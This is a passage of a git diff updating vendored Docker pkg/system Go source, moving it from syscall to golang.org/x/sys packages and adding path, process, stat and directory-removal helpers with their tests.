-	"syscall"
+	"golang.org/x/sys/unix"
 )
 
 // Mknod creates a filesystem node (file, device special file or named pipe) named path
 // with attributes specified by mode and dev.
 func Mknod(path string, mode uint32, dev int) error {
-	return syscall.Mknod(path, mode, dev)
+	return unix.Mknod(path, mode, dev)
 }
 
 // Mkdev is used to build the value of linux devices (in /dev/) which specifies major
@@ -18,5 +18,5 @@ func Mknod(path string, mode uint32, dev int) error {
 // They are, from low to high: the lower 8 bits of the minor, then 12 bits of the major,
 // then the top 12 bits of the minor.
 func Mkdev(major int64, minor int64) uint32 {
-	return uint32(((minor & 0xfff00) << 12) | ((major & 0xfff) << 8) | (minor & 0xff))
+	return uint32(unix.Mkdev(uint32(major), uint32(minor)))
 }
diff --git a/vendor/github.com/docker/docker/pkg/system/mknod_windows.go b/vendor/github.com/docker/docker/pkg/system/mknod_windows.go
index 2e863c0215..ec89d7a15e 100644
--- a/vendor/github.com/docker/docker/pkg/system/mknod_windows.go
+++ b/vendor/github.com/docker/docker/pkg/system/mknod_windows.go
@@ -1,6 +1,4 @@
-// +build windows
-
-package system
+package system // import "github.com/docker/docker/pkg/system"
 
 // Mknod is not implemented on Windows.
 func Mknod(path string, mode uint32, dev int) error {
diff --git a/vendor/github.com/docker/docker/pkg/system/path.go b/vendor/github.com/docker/docker/pkg/system/path.go
new file mode 100644
index 0000000000..a3d957afab
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/path.go
@@ -0,0 +1,60 @@
+package system // import "github.com/docker/docker/pkg/system"
+
+import (
+	"fmt"
+	"path/filepath"
+	"runtime"
+	"strings"
+
+	"github.com/containerd/continuity/pathdriver"
+)
+
+const defaultUnixPathEnv = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
+
+// DefaultPathEnv is unix style list of directories to search for
+// executables. Each directory is separated from the next by a colon
+// ':' character .
+func DefaultPathEnv(os string) string {
+	if runtime.GOOS == "windows" {
+		if os != runtime.GOOS {
+			return defaultUnixPathEnv
+		}
+		// Deliberately empty on Windows containers on Windows as the default path will be set by
+		// the container. Docker has no context of what the default path should be.
+		return ""
+	}
+	return defaultUnixPathEnv
+
+}
+
+// CheckSystemDriveAndRemoveDriveLetter verifies that a path, if it includes a drive letter,
+// is the system drive.
+// On Linux: this is a no-op.
+// On Windows: this does the following>
+// CheckSystemDriveAndRemoveDriveLetter verifies and manipulates a Windows path.
+// This is used, for example, when validating a user provided path in docker cp.
+// If a drive letter is supplied, it must be the system drive. The drive letter
+// is always removed. Also, it translates it to OS semantics (IOW / to \). We
+// need the path in this syntax so that it can ultimately be concatenated with
+// a Windows long-path which doesn't support drive-letters. Examples:
+// C:			--> Fail
+// C:\			--> \
+// a			--> a
+// /a			--> \a
+// d:\			--> Fail
+func CheckSystemDriveAndRemoveDriveLetter(path string, driver pathdriver.PathDriver) (string, error) {
+	if runtime.GOOS != "windows" || LCOWSupported() {
+		return path, nil
+	}
+
+	if len(path) == 2 && string(path[1]) == ":" {
+		return "", fmt.Errorf("No relative path specified in %q", path)
+	}
+	if !driver.IsAbs(path) || len(path) < 2 {
+		return filepath.FromSlash(path), nil
+	}
+	if string(path[1]) == ":" && !strings.EqualFold(string(path[0]), "c") {
+		return "", fmt.Errorf("The specified path is not on the system drive (C:)")
+	}
+	return filepath.FromSlash(path[2:]), nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/path_unix.go b/vendor/github.com/docker/docker/pkg/system/path_unix.go
deleted file mode 100644
index c607c4db09..0000000000
--- a/vendor/github.com/docker/docker/pkg/system/path_unix.go
+++ /dev/null
@@ -1,14 +0,0 @@
-// +build !windows
-
-package system
-
-// DefaultPathEnv is unix style list of directories to search for
-// executables. Each directory is separated from the next by a colon
-// ':' character .
-const DefaultPathEnv = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
-
-// CheckSystemDriveAndRemoveDriveLetter verifies that a path, if it includes a drive letter,
-// is the system drive. This is a no-op on Linux.
-func CheckSystemDriveAndRemoveDriveLetter(path string) (string, error) {
-	return path, nil
-}
diff --git a/vendor/github.com/docker/docker/pkg/system/path_windows.go b/vendor/github.com/docker/docker/pkg/system/path_windows.go
deleted file mode 100644
index cbfe2c1576..0000000000
--- a/vendor/github.com/docker/docker/pkg/system/path_windows.go
+++ /dev/null
@@ -1,37 +0,0 @@
-// +build windows
-
-package system
-
-import (
-	"fmt"
-	"path/filepath"
-	"strings"
-)
-
-// DefaultPathEnv is deliberately empty on Windows as the default path will be set by
-// the container. Docker has no context of what the default path should be.
-const DefaultPathEnv = ""
-
-// CheckSystemDriveAndRemoveDriveLetter verifies and manipulates a Windows path.
-// This is used, for example, when validating a user provided path in docker cp.
-// If a drive letter is supplied, it must be the system drive. The drive letter
-// is always removed. Also, it translates it to OS semantics (IOW / to \). We
-// need the path in this syntax so that it can ultimately be contatenated with
-// a Windows long-path which doesn't support drive-letters. Examples:
-// C:			--> Fail
-// C:\			--> \
-// a			--> a
-// /a			--> \a
-// d:\			--> Fail
-func CheckSystemDriveAndRemoveDriveLetter(path string) (string, error) {
-	if len(path) == 2 && string(path[1]) == ":" {
-		return "", fmt.Errorf("No relative path specified in %q", path)
-	}
-	if !filepath.IsAbs(path) || len(path) < 2 {
-		return filepath.FromSlash(path), nil
-	}
-	if string(path[1]) == ":" && !strings.EqualFold(string(path[0]), "c") {
-		return "", fmt.Errorf("The specified path is not on the system drive (C:)")
-	}
-	return filepath.FromSlash(path[2:]), nil
-}
diff --git a/vendor/github.com/docker/docker/pkg/system/path_windows_test.go b/vendor/github.com/docker/docker/pkg/system/path_windows_test.go
index eccb26aaea..974707eb71 100644
--- a/vendor/github.com/docker/docker/pkg/system/path_windows_test.go
+++ b/vendor/github.com/docker/docker/pkg/system/path_windows_test.go
@@ -1,19 +1,24 @@
 // +build windows
 
-package system
+package system // import "github.com/docker/docker/pkg/system"
 
-import "testing"
+import (
+	"testing"
+
+	"github.com/containerd/continuity/pathdriver"
+)
 
 // TestCheckSystemDriveAndRemoveDriveLetter tests CheckSystemDriveAndRemoveDriveLetter
 func TestCheckSystemDriveAndRemoveDriveLetter(t *testing.T) {
 	// Fails if not C drive.
-	path, err := CheckSystemDriveAndRemoveDriveLetter(`d:\`)
+	_, err := CheckSystemDriveAndRemoveDriveLetter(`d:\`, pathdriver.LocalPathDriver)
 	if err == nil || (err != nil && err.Error() != "The specified path is not on the system drive (C:)") {
 		t.Fatalf("Expected error for d:")
 	}
 
 	// Single character is unchanged
-	if path, err = CheckSystemDriveAndRemoveDriveLetter("z"); err != nil {
+	var path string
+	if path, err = CheckSystemDriveAndRemoveDriveLetter("z", pathdriver.LocalPathDriver); err != nil {
 		t.Fatalf("Single character should pass")
 	}
 	if path != "z" {
@@ -21,7 +26,7 @@ func TestCheckSystemDriveAndRemoveDriveLetter(t *testing.T) {
 	}
 
 	// Two characters without colon is unchanged
-	if path, err = CheckSystemDriveAndRemoveDriveLetter("AB"); err != nil {
+	if path, err = CheckSystemDriveAndRemoveDriveLetter("AB", pathdriver.LocalPathDriver); err != nil {
 		t.Fatalf("2 characters without colon should pass")
 	}
 	if path != "AB" {
@@ -29,7 +34,7 @@ func TestCheckSystemDriveAndRemoveDriveLetter(t *testing.T) {
 	}
 
 	// Abs path without drive letter
-	if path, err = CheckSystemDriveAndRemoveDriveLetter(`\l`); err != nil {
+	if path, err = CheckSystemDriveAndRemoveDriveLetter(`\l`, pathdriver.LocalPathDriver); err != nil {
 		t.Fatalf("abs path no drive letter should pass")
 	}
 	if path != `\l` {
@@ -37,7 +42,7 @@ func TestCheckSystemDriveAndRemoveDriveLetter(t *testing.T) {
 	}
 
 	// Abs path without drive letter, linux style
-	if path, err = CheckSystemDriveAndRemoveDriveLetter(`/l`); err != nil {
+	if path, err = CheckSystemDriveAndRemoveDriveLetter(`/l`, pathdriver.LocalPathDriver); err != nil {
 		t.Fatalf("abs path no drive letter linux style should pass")
 	}
 	if path != `\l` {
@@ -45,7 +50,7 @@ func TestCheckSystemDriveAndRemoveDriveLetter(t *testing.T) {
 	}
 
 	// Drive-colon should be stripped
-	if path, err = CheckSystemDriveAndRemoveDriveLetter(`c:\`); err != nil {
+	if path, err = CheckSystemDriveAndRemoveDriveLetter(`c:\`, pathdriver.LocalPathDriver); err != nil {
 		t.Fatalf("An absolute path should pass")
 	}
 	if path != `\` {
@@ -53,7 +58,7 @@ func TestCheckSystemDriveAndRemoveDriveLetter(t *testing.T) {
 	}
 
 	// Verify with a linux-style path
-	if path, err = CheckSystemDriveAndRemoveDriveLetter(`c:/`); err != nil {
+	if path, err = CheckSystemDriveAndRemoveDriveLetter(`c:/`, pathdriver.LocalPathDriver); err != nil {
 		t.Fatalf("An absolute path should pass")
 	}
 	if path != `\` {
@@ -61,7 +66,7 @@ func TestCheckSystemDriveAndRemoveDriveLetter(t *testing.T) {
 	}
 
 	// Failure on c:
-	if path, err = CheckSystemDriveAndRemoveDriveLetter(`c:`); err == nil {
+	if path, err = CheckSystemDriveAndRemoveDriveLetter(`c:`, pathdriver.LocalPathDriver); err == nil {
 		t.Fatalf("c: should fail")
 	}
 	if err.Error() != `No relative path specified in "c:"` {
@@ -69,7 +74,7 @@ func TestCheckSystemDriveAndRemoveDriveLetter(t *testing.T) {
 	}
 
 	// Failure on d:
-	if path, err = CheckSystemDriveAndRemoveDriveLetter(`d:`); err == nil {
+	if path, err = CheckSystemDriveAndRemoveDriveLetter(`d:`, pathdriver.LocalPathDriver); err == nil {
 		t.Fatalf("c: should fail")
 	}
 	if err.Error() != `No relative path specified in "d:"` {
diff --git a/vendor/github.com/docker/docker/utils/process_unix.go b/vendor/github.com/docker/docker/pkg/system/process_unix.go
similarity index 50%
rename from vendor/github.com/docker/docker/utils/process_unix.go
rename to vendor/github.com/docker/docker/pkg/system/process_unix.go
index fc0b1c8b74..0195a891b2 100644
--- a/vendor/github.com/docker/docker/utils/process_unix.go
+++ b/vendor/github.com/docker/docker/pkg/system/process_unix.go
@@ -1,15 +1,17 @@
-// +build linux freebsd solaris
+// +build linux freebsd darwin
 
-package utils
+package system // import "github.com/docker/docker/pkg/system"
 
 import (
 	"syscall"
+
+	"golang.org/x/sys/unix"
 )
 
 // IsProcessAlive returns true if process with a given pid is running.
 func IsProcessAlive(pid int) bool {
-	err := syscall.Kill(pid, syscall.Signal(0))
-	if err == nil || err == syscall.EPERM {
+	err := unix.Kill(pid, syscall.Signal(0))
+	if err == nil || err == unix.EPERM {
 		return true
 	}
 
@@ -18,5 +20,5 @@ func IsProcessAlive(pid int) bool {
 
 // KillProcess force-stops a process.
 func KillProcess(pid int) {
-	syscall.Kill(pid, syscall.SIGKILL)
+	unix.Kill(pid, unix.SIGKILL)
 }
diff --git a/vendor/github.com/docker/docker/pkg/system/process_windows.go b/vendor/github.com/docker/docker/pkg/system/process_windows.go
new file mode 100644
index 0000000000..4e70c97b18
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/process_windows.go
@@ -0,0 +1,18 @@
+package system // import "github.com/docker/docker/pkg/system"
+
+import "os"
+
+// IsProcessAlive returns true if process with a given pid is running.
+func IsProcessAlive(pid int) bool {
+	_, err := os.FindProcess(pid)
+
+	return err == nil
+}
+
+// KillProcess force-stops a process.
+func KillProcess(pid int) {
+	p, err := os.FindProcess(pid)
+	if err == nil {
+		p.Kill()
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/rm.go b/vendor/github.com/docker/docker/pkg/system/rm.go
new file mode 100644
index 0000000000..02e4d26221
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/rm.go
@@ -0,0 +1,80 @@
+package system // import "github.com/docker/docker/pkg/system"
+
+import (
+	"os"
+	"syscall"
+	"time"
+
+	"github.com/docker/docker/pkg/mount"
+	"github.com/pkg/errors"
+)
+
+// EnsureRemoveAll wraps `os.RemoveAll` to check for specific errors that can
+// often be remedied.
+// Only use `EnsureRemoveAll` if you really want to make every effort to remove
+// a directory.
+//
+// Because of the way `os.Remove` (and by extension `os.RemoveAll`) works, there
+// can be a race between reading directory entries and then actually attempting
+// to remove everything in the directory.
+// These types of errors do not need to be returned since it's ok for the dir to
+// be gone we can just retry the remove operation.
+//
+// This should not return a `os.ErrNotExist` kind of error under any circumstances
+func EnsureRemoveAll(dir string) error {
+	notExistErr := make(map[string]bool)
+
+	// track retries
+	exitOnErr := make(map[string]int)
+	maxRetry := 50
+
+	// Attempt to unmount anything beneath this dir first
+	mount.RecursiveUnmount(dir)
+
+	for {
+		err := os.RemoveAll(dir)
+		if err == nil {
+			return err
+		}
+
+		pe, ok := err.(*os.PathError)
+		if !ok {
+			return err
+		}
+
+		if os.IsNotExist(err) {
+			if notExistErr[pe.Path] {
+				return err
+			}
+			notExistErr[pe.Path] = true
+
+			// There is a race where some subdir can be removed but after the parent
+			//   dir entries have been read.
+			// So the path could be from `os.Remove(subdir)`
+			// If the reported non-existent path is not the passed in `dir` we
+			// should just retry, but otherwise return with no error.
+			if pe.Path == dir {
+				return nil
+			}
+			continue
+		}
+
+		if pe.Err != syscall.EBUSY {
+			return err
+		}
+
+		if mounted, _ := mount.Mounted(pe.Path); mounted {
+			if e := mount.Unmount(pe.Path); e != nil {
+				if mounted, _ := mount.Mounted(pe.Path); mounted {
+					return errors.Wrapf(e, "error while removing %s", dir)
+				}
+			}
+		}
+
+		if exitOnErr[pe.Path] == maxRetry {
+			return err
+		}
+		exitOnErr[pe.Path]++
+		time.Sleep(100 * time.Millisecond)
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/rm_test.go b/vendor/github.com/docker/docker/pkg/system/rm_test.go
new file mode 100644
index 0000000000..0448aac619
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/system/rm_test.go
@@ -0,0 +1,84 @@
+package system // import "github.com/docker/docker/pkg/system"
+
+import (
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"runtime"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/pkg/mount"
+	"gotest.tools/skip"
+)
+
+func TestEnsureRemoveAllNotExist(t *testing.T) {
+	// should never return an error for a non-existent path
+	if err := EnsureRemoveAll("/non/existent/path"); err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestEnsureRemoveAllWithDir(t *testing.T) {
+	dir, err := ioutil.TempDir("", "test-ensure-removeall-with-dir")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if err := EnsureRemoveAll(dir); err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestEnsureRemoveAllWithFile(t *testing.T) {
+	tmp, err := ioutil.TempFile("", "test-ensure-removeall-with-dir")
+	if err != nil {
+		t.Fatal(err)
+	}
+	tmp.Close()
+	if err := EnsureRemoveAll(tmp.Name()); err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestEnsureRemoveAllWithMount(t *testing.T) {
+	skip.If(t, runtime.GOOS == "windows", "mount not supported on Windows")
+	skip.If(t, os.Getuid() != 0, "skipping test that requires root")
+
+	dir1, err := ioutil.TempDir("", "test-ensure-removeall-with-dir1")
+	if err != nil {
+		t.Fatal(err)
+	}
+	dir2, err := ioutil.TempDir("", "test-ensure-removeall-with-dir2")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(dir2)
+
+	bindDir := filepath.Join(dir1, "bind")
+	if err := os.MkdirAll(bindDir, 0755); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := mount.Mount(dir2, bindDir, "none", "bind"); err != nil {
+		t.Fatal(err)
+	}
+
+	done := make(chan struct{})
+	go func() {
+		err = EnsureRemoveAll(dir1)
+		close(done)
+	}()
+
+	select {
+	case <-done:
+		if err != nil {
+			t.Fatal(err)
+		}
+	case <-time.After(5 * time.Second):
+		t.Fatal("timeout waiting for EnsureRemoveAll to finish")
+	}
+
+	if _, err := os.Stat(dir1); !os.IsNotExist(err) {
+		t.Fatalf("expected %q to not exist", dir1)
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/system/stat_darwin.go b/vendor/github.com/docker/docker/pkg/system/stat_darwin.go
index f0742f59e5..c1c0ee9f38 100644
--- a/vendor/github.com/docker/docker/pkg/system/stat_darwin.go
+++ b/vendor/github.com/docker/docker/pkg/system/stat_darwin.go
@@ -1,10 +1,8 @@
-package system
+package system // import "github.com/docker/docker/pkg/system"
 
-import (
-	"syscall"
-)
+import "syscall"
 
-// fromStatT creates a system.StatT type from a syscall.Stat_t type
+// fromStatT converts a syscall.Stat_t type to a system.Stat_t type
 func fromStatT(s *syscall.Stat_t) (*StatT, error) {
 	return &StatT{size: s.Size,
 		mode: uint32(s.Mode),
@@ -13,20 +11,3 @@ func fromStatT(s *syscall.Stat_t) (*StatT, error) {
 		rdev: uint64(s.Rdev),
 		mtim: s.Mtimespec}, nil
 }
-
-// FromStatT loads a system.StatT from a syscall.Stat_t.
-func FromStatT(s *syscall.Stat_t) (*StatT, error) {
-	return fromStatT(s)
-}
-
-// Stat takes a path to a file and returns
-// a system.StatT type pertaining to that file.
-//
-// Throws an error if the file does not exist
-func Stat(path string) (*StatT, error) {
-	s := &syscall.Stat_t{}
-	if err := syscall.Stat(path, s); err != nil {
-		return nil, err
-	}
-	return fromStatT(s)
-}
diff --git a/vendor/github.com/docker/docker/pkg/system/stat_freebsd.go b/vendor/github.com/docker/docker/pkg/system/stat_freebsd.go
index d0fb6f1519..c1c0ee9f38 100644
--- a/vendor/github.com/docker/docker/pkg/system/stat_freebsd.go
+++ b/vendor/github.com/docker/docker/pkg/system/stat_freebsd.go
@@ -1,8 +1,6 @@
-package system
+package system // import "github.com/docker/docker/pkg/system"
 
-import (
-	"syscall"
-)
+import "syscall"
 
 // fromStatT converts a syscall.Stat_t type to a system.Stat_t type
 func fromStatT(s *syscall.Stat_t) (*StatT, error) {
@@ -13,15 +11,3 @@ func fromStatT(s *syscall.Stat_t) (*StatT, error) {
 		rdev: uint64(s.Rdev),
 		mtim: s.Mtimespec}, nil
 }
-
-// Stat takes a path to a file and returns
-// a system.Stat_t type pertaining to that file.
-//
-// Throws an error if the file does not exist
-func Stat(path string) (*StatT, error) {
-	s := &syscall.Stat_t{}
-	if err := syscall.Stat(path, s); err != nil {
-		return nil, err
-	}
-	return fromStatT(s)
-}
diff --git a/vendor/github.com/docker/docker/pkg/system/stat_linux.go b/vendor/github.com/docker/docker/pkg/system/stat_linux.go
index 8b1eded138..98c9eb18d1 100644
--- a/vendor/github.com/docker/docker/pkg/system/stat_linux.go
+++ b/vendor/github.com/docker/docker/pkg/system/stat_linux.go
@@ -1,8 +1,6 @@
-package system
+package system // import "github.com/docker/docker/pkg/system"
 
-import (
-	"syscall"
-)
+import "syscall"
 
 // fromStatT converts a syscall.Stat_t type to a system.Stat_t type
 func fromStatT(s *syscall.Stat_t) (*StatT, error) {
@@ -14,20 +12,8 @@ func fromStatT(s *syscall.Stat_t) (*StatT, error) {
 		mtim: s.Mtim}, nil
 }
 
-// FromStatT exists only on linux, and loads a system.StatT from a
-// syscal.Stat_t.
+// FromStatT converts a syscall.Stat_t type to a system.Stat_t type
+// This is exposed on Linux as pkg/archive/changes uses it.
 func FromStatT(s *syscall.Stat_t) (*StatT, error) {
 	return fromStatT(s)
 }
-
-// Stat takes a path to a file and returns
-// a system.StatT type pertaining to that file.
-//
-// Throws an error if the file does not exist
-func Stat(path string) (*StatT, error) {
-	s := &syscall.Stat_t{}
-	if err := syscall.Stat(path, s); err != nil {
-		return nil, err
-	}
-	return fromStatT(s)
-}
diff --git a/vendor/github.com/docker/docker/pkg/system/stat_openbsd.go b/vendor/github.com/docker/docker/pkg/system/stat_openbsd.go
index 3c3b71fb21..756b92d1e6 100644
--- a/vendor/github.com/docker/docker/pkg/system/stat_openbsd.go
+++ b/vendor/github.com/docker/docker/pkg/system/stat_openbsd.go
@@ -1,10 +1,8 @@
-package system
+package system // import "github.com/docker/docker/pkg/system"
 
-import (
-	"syscall"
-)
+import "syscall"
 
-// fromStatT creates a system.StatT type from a syscall.Stat_t type
+// fromStatT converts a syscall.Stat_t type to a system.Stat_t type
 func fromStatT(s *syscall.Stat_t) (*StatT, error) {
 	return &StatT{size: s.Size,
 		mode: uint32(s.Mode),
diff --git a/vendor/github.com/docker/docker/pkg/system/stat_solaris.go b/vendor/github.com/docker/docker/pkg/system/stat_solaris.go
index 0216985a25..756b92d1e6 100644
--- a/vendor/github.com/docker/docker/pkg/system/stat_solaris.go
+++ b/vendor/github.com/docker/docker/pkg/system/stat_solaris.go
@@ -1,12 +1,8 @@
-// +build solaris
+package system // import "github.com/docker/docker/pkg/system"
 
-package system
+import "syscall"
 
-import (
-	"syscall"
-)
-
-// fromStatT creates a system.StatT type from a syscall.Stat_t type
+// fromStatT converts a syscall.Stat_t type to a system.Stat_t type
 func fromStatT(s *syscall.Stat_t) (*StatT, error) {
 	return &StatT{size: s.Size,
 		mode: uint32(s.Mode),
@@ -15,20 +11,3 @@ func fromStatT(s *syscall.Stat_t) (*StatT, error) {
 		rdev: uint64(s.Rdev),
 		mtim: s.Mtim}, nil
 }
-
-// FromStatT loads a system.StatT from a syscal.Stat_t.
-func FromStatT(s *syscall.Stat_t) (*StatT, error) {
-	return fromStatT(s)
-}
-
-// Stat takes a path to a file and returns
-// a system.StatT type pertaining to that file.
-//
-// Throws an error if the file does not exist
-func Stat(path string) (*StatT, error) {
-	s := &syscall.Stat_t{}
-	if err := syscall.Stat(path, s); err != nil {
-		return nil, err
-	}
-	return fromStatT(s)
-}
diff --git a/vendor/github.com/docker/docker/pkg/system/stat.go b/vendor/github.com/docker/docker/pkg/system/stat_unix.go
similarity index 63%
rename from vendor/github.com/docker/docker/pkg/system/stat.go
rename to vendor/github.com/docker/docker/pkg/system/stat_unix.go
index 087034c5ec..3d7e2ebbef 100644
--- a/vendor/github.com/docker/docker/pkg/system/stat.go
+++ b/vendor/github.com/docker/docker/pkg/system/stat_unix.go
@@ -1,6 +1,6 @@
 // +build !windows
 
-package system
+package system // import "github.com/docker/docker/pkg/system"
 
 import (
 	"syscall"
@@ -47,7 +47,19 @@ func (s StatT) Mtim() syscall.Timespec {
 	return s.mtim
 }
 
-// GetLastModification returns file's last modification time.
-func (s StatT) GetLastModification() syscall.Timespec {
-	return s.Mtim()
+// IsDir reports whether s describes a directory.
+func (s StatT) IsDir() bool {
+	return s.mode&syscall.S_IFDIR != 0
+}
+
+// Stat takes a path to a file and returns
+// a system.StatT type pertaining to that file.
+//
+// Throws an error if the file does not exist
+func Stat(path string) (*StatT, error) {
+	s := &syscall.Stat_t{}
+	if err := syscall.Stat(path, s); err != nil {
+		return nil, err
+	}
+	return fromStatT(s)
 }
diff --git a/vendor/github.com/docker/docker/pkg/system/stat_unix_test.go b/vendor/github.com/docker/docker/pkg/system/stat_unix_test.go
index dee8d30a19..44e048f2a7 100644
--- a/vendor/github.com/docker/docker/pkg/system/stat_unix_test.go
+++ b/vendor/github.com/docker/docker/pkg/system/stat_unix_test.go
@@ -1,11 +1,13 @@
 // +build linux freebsd
 
-package system
+package system // import "github.com/docker/docker/pkg/system"
 
 import (
 	"os"
 	"syscall"
 	"testing"
+
+	"gotest.tools/assert"
 )
 
 // TestFromStatT tests fromStatT for a tempfile
@@ -15,11 +17,10 @@ func TestFromStatT(t *testing.T) {
 
 	stat := &syscall.Stat_t{}
 	err := syscall.Lstat(file, stat)
+	assert.NilError(t, err)
 
 	s, err := fromStatT(stat)
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 
 	if stat.Mode != s.Mode() {
 		t.Fatal("got invalid mode")
diff --git a/vendor/github.com/docker/docker/pkg/system/stat_unsupported.go b/vendor/github.com/docker/docker/pkg/system/stat_unsupported.go
deleted file mode 100644
index 5d85f523cf..0000000000
--- a/vendor/github.com/docker/docker/pkg/system/stat_unsupported.go
+++ /dev/null
@@ -1,17 +0,0 @@
-// +build !linux,!windows,!freebsd,!solaris,!openbsd,!darwin
-
-package system
-
-import (
-	"syscall"
-)
-
-// fromStatT creates a system.StatT type from a syscall.Stat_t type
-func fromStatT(s *syscall.Stat_t) (*StatT, error) {
-	return &StatT{size: s.Size,
-		mode: uint32(s.Mode),
-		uid:  s.Uid,
-		gid:  s.Gid,
-		rdev: uint64(s.Rdev),
-		mtim: s.Mtimespec}, nil
-}
diff --git a/vendor/github.com/docker/docker/pkg/system/stat_windows.go b/vendor/github.com/docker/docker/pkg/system/stat_windows.go
index 39490c625c..b2456cb887 100644
--- a/vendor/github.com/docker/docker/pkg/system/stat_windows.go
+++ b/vendor/github.com/docker/docker/pkg/system/stat_windows.go
@@ -1,6 +1,4 @@
-// +build windows
-
-package system
+package system // import "github.com/docker/docker/pkg/system"
 
 import (
 	"os"
@@ -8,18 +6,11 @@ import (
 )
 
 // StatT type contains status of a file. It contains metadata
-// like name, permission, size, etc about a file.
+// like permission, size, etc about a file.
 type StatT struct {
-	name    string
-	size    int64
-	mode    os.FileMode
-	modTime time.Time
-	isDir   bool
-}
-
-// Name returns file's name.
-func (s StatT) Name() string {
-	return s.name
+	mode os.FileMode
+	size int64
+	mtim time.Time
 }
 
 // Size returns file's size.
@@ -29,15 +20,30 @@ func (s StatT) Size() int64 {
 
 // Mode returns file's permission mode.
 func (s StatT) Mode() os.FileMode {
-	return s.mode
+	return os.FileMode(s.mode)
+}
+
+// Mtim returns file's last modification time.
+func (s StatT) Mtim() time.Time {
+	return time.Time(s.mtim)
 }
 
-// ModTime returns file's last modification time.
-func (s StatT) ModTime() time.Time {
-	return s.modTime
+// Stat takes a path to a file and returns
+// a system.StatT type pertaining to that file.
+//
+// Throws an error if the file does not exist
+func Stat(path string) (*StatT, error) {
+	fi, err := os.Stat(path)
+	if err != nil {
+		return nil, err
+	}
+	return fromStatT(&fi)
 }
 
-// IsDir returns whether file is actually a directory.
-func (s StatT) IsDir() bool {
-	return s.isDir
+// fromStatT converts a os.FileInfo type to a system.StatT type
+func fromStatT(fi *os.FileInfo) (*StatT, error) {
+	return &StatT{
+		size: (*fi).Size(),
+		mode: (*fi).Mode(),
+		mtim: (*fi).ModTime()}, nil
 }
diff --git a/vendor/github.com/docker/docker/pkg/system/syscall_unix.go b/vendor/github.com/docker/docker/pkg/system/syscall_unix.go
index 3ae9128468..919a412a7b 100644
--- a/vendor/github.com/docker/docker/pkg/system/syscall_unix.go
+++ b/vendor/github.com/docker/docker/pkg/system/syscall_unix.go
@@ -1,13 +1,13 @@
 // +build linux freebsd
 
-package system
+package system // import "github.com/docker/docker/pkg/system"
 
-import "syscall"
+import "golang.org/x/sys/unix"
 
 // Unmount is a platform-specific helper function to call
 // the unmount syscall.
 func Unmount(dest string) error {
-	return syscall.Unmount(dest, 0)
+	return unix.Unmount(dest, 0)
 }
 
 // CommandLineToArgv should not be used on Unix.
diff --git a/vendor/github.com/docker/docker/pkg/system/syscall_windows.go b/vendor/github.com/docker/docker/pkg/system/syscall_windows.go
index 1f311874f4..ee7e0256f3 100644
--- a/vendor/github.com/docker/docker/pkg/system/syscall_windows.go
+++ b/vendor/github.com/docker/docker/pkg/system/syscall_windows.go
@@ -1,15 +1,17 @@
-package system
+package system // import "github.com/docker/docker/pkg/system"
 
 import (
-	"syscall"
+	"fmt"
 	"unsafe"
 
-	"github.com/Sirupsen/logrus"
+	"github.com/sirupsen/logrus"
+	"golang.org/x/sys/windows"
 )
 
 var (
-	ntuserApiset      = syscall.NewLazyDLL("ext-ms-win-ntuser-window-l1-1-0")
-	procGetVersionExW = modkernel32.NewProc("GetVersionExW")
+	ntuserApiset       = windows.NewLazyDLL("ext-ms-win-ntuser-window-l1-1-0")
+	procGetVersionExW  = modkernel32.NewProc("GetVersionExW")
+	procGetProductInfo = modkernel32.NewProc("GetProductInfo")
 )
 
 // OSVersion is a wrapper for Windows version information
@@ -41,7 +43,7 @@ type osVersionInfoEx struct {
 func GetOSVersion() OSVersion {
 	var err error
 	osv := OSVersion{}
-	osv.Version, err = syscall.GetVersion()
+	osv.Version, err = windows.GetVersion()
 	if err != nil {
 		// GetVersion never fails.
 		panic(err)
@@ -52,6 +54,10 @@ func GetOSVersion() OSVersion {
 	return osv
 }
 
+func (osv OSVersion) ToString() string {
+	return fmt.Sprintf("%d.%d.%d", osv.MajorVersion, osv.MinorVersion, osv.Build)
+}
+
 // IsWindowsClient returns true if the SKU is client
 // @engine maintainers - this function should not be removed or modified as it
 // is used to enforce licensing restrictions on Windows.
@@ -66,6 +72,22 @@ func IsWindowsClient() bool {
 	return osviex.ProductType == verNTWorkstation
 }
 
+// IsIoTCore returns true if the currently running image is based off of
+// Windows 10 IoT Core.
+// @engine maintainers - this function should not be removed or modified as it
+// is used to enforce licensing restrictions on Windows.
+func IsIoTCore() bool {
+	var returnedProductType uint32
+	r1, _, err := procGetProductInfo.Call(6, 1, 0, 0, uintptr(unsafe.Pointer(&returnedProductType)))
+	if r1 == 0 {
+		logrus.Warnf("GetProductInfo failed - assuming this is not IoT: %v", err)
+		return false
+	}
+	const productIoTUAP = 0x0000007B
+	const productIoTUAPCommercial = 0x00000083
+	return returnedProductType == productIoTUAP || returnedProductType == productIoTUAPCommercial
+}
+
 // Unmount is a platform-specific helper function to call
 // the unmount syscall. Not supported on Windows
 func Unmount(dest string) error {
@@ -76,20 +98,20 @@ func Unmount(dest string) error {
 func CommandLineToArgv(commandLine string) ([]string, error) {
 	var argc int32
 
-	argsPtr, err := syscall.UTF16PtrFromString(commandLine)
+	argsPtr, err := windows.UTF16PtrFromString(commandLine)
 	if err != nil {
 		return nil, err
 	}
 
-	argv, err := syscall.CommandLineToArgv(argsPtr, &argc)
+	argv, err := windows.CommandLineToArgv(argsPtr, &argc)
 	if err != nil {
 		return nil, err
 	}
-	defer syscall.LocalFree(syscall.Handle(uintptr(unsafe.Pointer(argv))))
